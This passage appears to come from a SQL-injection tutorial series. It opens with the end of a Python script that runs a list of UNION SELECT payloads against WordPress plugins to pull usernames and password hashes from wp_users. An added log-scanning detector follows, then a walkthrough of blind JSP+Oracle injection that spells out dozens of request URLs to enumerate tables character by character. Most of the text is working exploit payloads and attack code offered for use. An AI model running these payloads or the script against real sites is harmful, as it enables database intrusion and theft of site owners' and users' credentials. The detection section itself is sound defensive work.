        "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
        "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
        "wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
        "wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
        "wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,conca(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
        "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
        "wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
        "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
        "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
        "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
        "index?page_id=2&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
        "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
        "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
        "wp-content/plugins/nextgen-smooth-gallery/nggSmoothFrame.php?galleryID=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
        "myLDlinker.php?url=-2/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
        "?page_id=2/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2",
        "wp-content/themes/limon/cplphoto.php?postid=-2+and+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,10,11,12+from+wp_users--&id=2",
        "?event_id=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
        "wp-content/plugins/photoracer/viewimg.php?id=-99999+union+select+0,1,2,3,4,user(),6,7,8/*",
        "?page_id=2&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users/*",
        "wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*",
        "mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--",
        "wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(user_login,0x3a,user_pass,0x3a,user_email)+FROM+wp_users--",
        "wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain",
        "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*"]

if len(sys.argv) != 2:
    print "\nUsage: ./wpsqli.py"
    print "Example: ./wpsqli.py www.site.com/\n"
    sys.exit(1)

host = sys.argv[1].replace("","").rsplit("/",1)[0]
if host[-1] != "/":
    host = host+"/"

print "\n[!] Site:",host
print "[!] SQL Loaded:",len(sqls)
server = main("/")[2]
print "[!] Server:",server
print "\n[!] Started:",timer()
print "\n[!] Scanning: SQL\n"

for sql in sqls:
    time.sleep(2)
    print "[+] Trying:",sql.replace("\n","")
    try:
        # fetch the page and look for 32-character hex strings (MD5 hashes) in the body
        source = urllib2.urlopen(""+host+sql.replace("\n","")).read()
        md5s = re.findall("[a-f0-9]"*32,source)
        if len(md5s) >= 1:
            print "[!]",host+sql.replace("\n","")
            for md5 in md5s:
                print "\n\t[!]Hash to MD5:",md5
    except(urllib2.HTTPError):
        pass

print "\n[-] Done\n"
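
Every technique in the script above and in the MySQL notes before it (UNION SELECT, information_schema, load_file, the @@ server variables, hex-encoded string literals, and /**/ comment sequences in place of spaces) leaves a recognisable trace in the web server's access log. The following Python is an added example, not the checker above or any project's own code: it normalises the query string the same way these payloads are obfuscated, matches a small indicator set, and decodes hex literals so an analyst sees the file or schema name that was actually requested. The log lines are constructed for the example (documentation IP ranges; two of the requests reuse payloads quoted on this page), and the indicator names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Common Log Format). Three requests carry
# payloads of the kinds shown on this page; the third line is a benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Feb/2023:07:38:34 +0000] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/* HTTP/1.1" 200 5123
203.0.113.5 - - [15/Feb/2023:07:38:36 +0000] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users HTTP/1.1" 200 811
198.51.100.7 - - [15/Feb/2023:07:40:01 +0000] "GET /news.php?id=5 HTTP/1.1" 200 4096
198.51.100.9 - - [15/Feb/2023:07:41:12 +0000] "GET /item.php?id=1+union+select+1,2,load_file(0x2F6574632F706173737764),4+from+information_schema.tables HTTP/1.1" 500 0
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

# Indicators are matched against the normalised (decoded, lower-cased) query string.
INDICATORS = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b")),
    ("information_schema", re.compile(r"\binformation_schema\.")),
    ("file_read", re.compile(r"\bload_file\s*\(")),
    ("server_variable", re.compile(r"@@(?:datadir|basedir|version|version_compile_os)\b")),
    ("credential_column", re.compile(r"\b(?:user_pass|user_login|adpassword)\b")),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{4,}\b")),
]


def normalize(query):
    """Undo the evasions seen on this page: URL encoding (applied twice, so that
    %2527-style double encoding resolves), '+' for space, and /**/ used as whitespace."""
    s = query
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    return " ".join(s.split()).lower()


def decode_hex_literals(text):
    """Return the printable ASCII strings behind 0x... literals, e.g. 0x67617264656e -> 'garden'."""
    found = []
    for m in re.finditer(r"\b0x([0-9a-f]{4,})\b", text):
        digits = m.group(1)
        if len(digits) % 2:
            continue
        raw = bytes.fromhex(digits)
        if raw.isascii() and raw.decode("ascii").isprintable():
            found.append(raw.decode("ascii"))
    return found


def scan_log(log_text):
    """Return one finding per request whose query string trips at least one indicator."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, when, uri, status = m.groups()
        path, _, query = uri.partition("?")
        norm = normalize(query)
        hits = [name for name, rx in INDICATORS if rx.search(norm)]
        if hits:
            findings.append({"ip": ip, "time": when, "path": path, "status": int(status),
                             "indicators": hits, "decoded_hex": decode_hex_literals(norm)})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["path"], f["status"], ",".join(f["indicators"]), f["decoded_hex"])
```

Decoding the hex literal is what turns a line of noise into an actionable finding: the fourth request resolves to a read of /etc/passwd, which tells the responder what was targeted without having to reproduce the request. The same normalisation should sit in front of any keyword rule, since a single-pass decoder misses the %2527 trick used by the second payload in the script's list.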

Part 8: JSP+Oracle injection method v1.0

Hello everyone, we are pt007 and solaris7, QQ: 7491805/564935; experts are welcome to come and exchange ideas :)

First, thanks to Huazai (华仔) and his friend Hotkey for developing the cnsafersi injection tool for everyone; without that tool there would be no article, hehe. This article is an analysis and write-up of the data obtained by capturing cnsafersi's packets. It was written in rather a hurry, and corrections from fellow practitioners are welcome where it falls short. We also hope an expert will develop a more powerful JSP injection program: cnsafersi currently only has select functionality, and we suggest that a new JSP injection tool add insert/delete/update/backup/upload/system-command functions, using NBSI's feature set as a reference. Reference article: "How to develop CnSaferSI".

First, the tool used in this article, the JSP injection utility cnsafersi developed by Huazai and his friend Hotkey. I will write a detailed tutorial on its usage soon:

Taking the AD table in the figure above as an example, the JSP+Oracle injection process is as follows:

1. Determine the injection type (numeric or string)

String vs. numeric data judgement (hopefully someone can refine this further and split it into separate numeric and string checks):

www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)

www.test.net/index_kaoyan_view.jsp?id=117 And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And user

www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And user

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)

www.test.net/index_kaoyan_view.jsp?id=117 And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='

www.test.net/index_kaoyan_view.jsp?id=117' And user

www.test.net/index_kaoyan_view.jsp?id=117' And str(98)

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1

www.test.net/index_kaoyan_view.jsp?id=117) And str(98)

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=('

www.test.net/index_kaoyan_view.jsp?id=117') And str(98)

A normal page is returned for:

www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)

www.test.net/index_kaoyan_view.jsp?id=117 And USER

2. Guess the number of tables and the table names

The database count is 3:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT COUNT (*) FROM USER_TABLES)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And UNISTR(1)>UNISTR(0)

The following guesses the number of tables

First digit of the table count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),1,1))

Second digit of the table count: 3

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 53>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),2,1))

Third digit of the table count: 1

www.test.net/index_kaoyan_view.jsp?id=117 And 51=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 77>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 67>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 65>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 109>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 102>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 99>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 97>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 54>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 52>ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 49=ascii(substr((SELECT COUNT (*) FROM USER_TABLES),3,1))

There are 131 tables in total, see the figure above.

The following guesses the table names:

The following determines that the length of the first table's name is 2:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

The following determines that the first character of the first table is A:

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

The following determines that the second character of the first table, AD, is D:

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=1)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

The following determines that the name of the second table, ADER, has length 4:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 3>nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4=nvl(length((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1)),0)

The following determines that the first character of the second table, ADER, is A:

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),1,1))

The following determines that the second character of the second table, ADER, is D:

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),2,1))

The following determines that the third character of the second table, ADER, is E:

www.test.net/index_kaoyan_view.jsp?id=117 And 68=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 79>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 73>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70=ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 70>ascii(substr((SELECT TABLE_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM USER_TABLES ORDER BY 1ASC)WHERE ROWNUM<=2)ORDER BY 1DESC)WHERE ROWNUM<=1),3,1))

